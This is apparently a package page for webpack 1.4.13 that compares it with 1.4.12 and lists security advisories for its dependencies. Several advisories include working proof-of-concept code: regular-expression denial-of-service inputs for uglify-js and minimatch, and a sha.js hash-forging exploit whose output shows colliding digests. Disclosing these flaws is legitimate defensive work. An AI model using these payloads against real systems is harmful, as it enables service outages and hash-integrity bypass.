Webpack version 1.4.13 represents a minor update over its predecessor, 1.4.12, focusing primarily on under-the-hood improvements and bug fixes rather than introducing significant new features. From a developer's perspective, both versions offer the same core functionality: robust module bundling for browser-based applications, enabling developers to manage complex JavaScript projects with CommonJs/AMD modules effectively. Crucially, both allow code splitting into bundles, optimizing load times. Webpack's powerful loader system remains consistent, allowing preprocessing of various file types like JSON, Jade, CoffeeScript, CSS, and LESS using loaders like css-loader, jade-loader and json-loader.
Dependency-wise, both versions share the same core requirements, including async, clone, mkdirp, esprima, tapable, optimist, memory-fs, uglify-js, watchpack, webpack-core, enhanced-resolve, and node-libs-browser. This indicates stability in the foundational aspects of the bundler. The devDependencies, containing tools like mocha, should, express, and various loaders, are also identical.
The key difference lies in the release date, with version 1.4.13 being released on November 5, 2014, after version 1.4.12 which was released on November 3, 2014. This suggests that 1.4.13 might address specific issues discovered in 1.4.12. Developers should consider upgrading to the latest minor version within the 1.4 branch to benefit from the refinements and potential bug fixes, to ensure a stable and efficient development workflow. The update ensures better compatibility and reliable build processes.
All the vulnerabilities related to the version 1.4.13 of the package
Regular Expression Denial of Service in uglify-js
Versions of uglify-js prior to 2.6.0 are affected by a regular expression denial of service vulnerability when malicious inputs are passed into the parse() method.
var u = require('uglify-js');
var genstr = function (len, chr) {
var result = "";
for (i=0; i<=len; i++) {
result = result + chr;
}
return result;
}
u.parse("var a = " + genstr(process.argv[2], "1") + ".1ee7;");
$ time node test.js 10000
real 0m1.091s
user 0m1.047s
sys 0m0.039s
$ time node test.js 80000
real 0m6.486s
user 0m6.229s
sys 0m0.094s
Update to version 2.6.0 or later.
Code injection in fsevents
fsevents before 1.2.11 depends on the https://fsevents-binaries.s3-us-west-2.amazonaws.com URL, which might allow an adversary to execute arbitrary code if any JavaScript project (that depends on fsevents) distributes code that was obtained from that URL at a time when it was controlled by an adversary.
Regular Expression Denial of Service in minimatch
Affected versions of minimatch are vulnerable to regular expression denial of service attacks when user input is passed into the pattern argument of minimatch(path, pattern).
var minimatch = require(“minimatch”);
// utility function for generating long strings
var genstr = function (len, chr) {
var result = “”;
for (i=0; i<=len; i++) {
result = result + chr;
}
return result;
}
var exploit = “[!” + genstr(1000000, “\\”) + “A”;
// minimatch exploit.
console.log(“starting minimatch”);
minimatch(“foo”, exploit);
console.log(“finishing minimatch”);
Update to version 3.0.2 or later.
minimatch ReDoS vulnerability
A vulnerability was found in the minimatch package. This flaw allows a Regular Expression Denial of Service (ReDoS) when calling the braceExpand function with specific arguments, resulting in a Denial of Service.
sha.js is missing type checks leading to hash rewind and passing on crafted data
This is the same as GHSA-cpq7-6gpm-g9rc but just for sha.js, as it has its own implementation.
Missing input type checks can allow types other than a well-formed Buffer or string, resulting in invalid values, hanging and rewinding the hash state (including turning a tagged hash into an untagged hash), or other generally undefined behaviour.
See PoC
const forgeHash = (data, payload) => JSON.stringify([payload, { length: -payload.length}, [...data]])
const sha = require('sha.js')
const { randomBytes } = require('crypto')
const sha256 = (...messages) => {
const hash = sha('sha256')
messages.forEach((m) => hash.update(m))
return hash.digest('hex')
}
const validMessage = [randomBytes(32), randomBytes(32), randomBytes(32)] // whatever
const payload = forgeHash(Buffer.concat(validMessage), 'Hashed input means safe')
const receivedMessage = JSON.parse(payload) // e.g. over network, whatever
console.log(sha256(...validMessage))
console.log(sha256(...receivedMessage))
console.log(receivedMessage[0])
Output:
638d5bf3ca5d1decf7b78029f1c4a58558143d62d0848d71e27b2a6ff312d7c4
638d5bf3ca5d1decf7b78029f1c4a58558143d62d0848d71e27b2a6ff312d7c4
Hashed input means safe
Or just:
> require('sha.js')('sha256').update('foo').digest('hex')
'2c26b46b68ffc68ff99b453c1d30413413422d706483bfa0f98a5e886266e7ae'
> require('sha.js')('sha256').update('fooabc').update({length:-3}).digest('hex')
'2c26b46b68ffc68ff99b453c1d30413413422d706483bfa0f98a5e886266e7ae'
{length: -x}. This is behind the PoC above, also this way an attacker can turn a tagged hash in cryptographic libraries into an untagged hash.{ length: buf.length, ...buf, 0: buf[0] + 256 }
This will result in the same hash as of buf, but can be treated by other code differently (e.g. bn.js){length:'1e99'}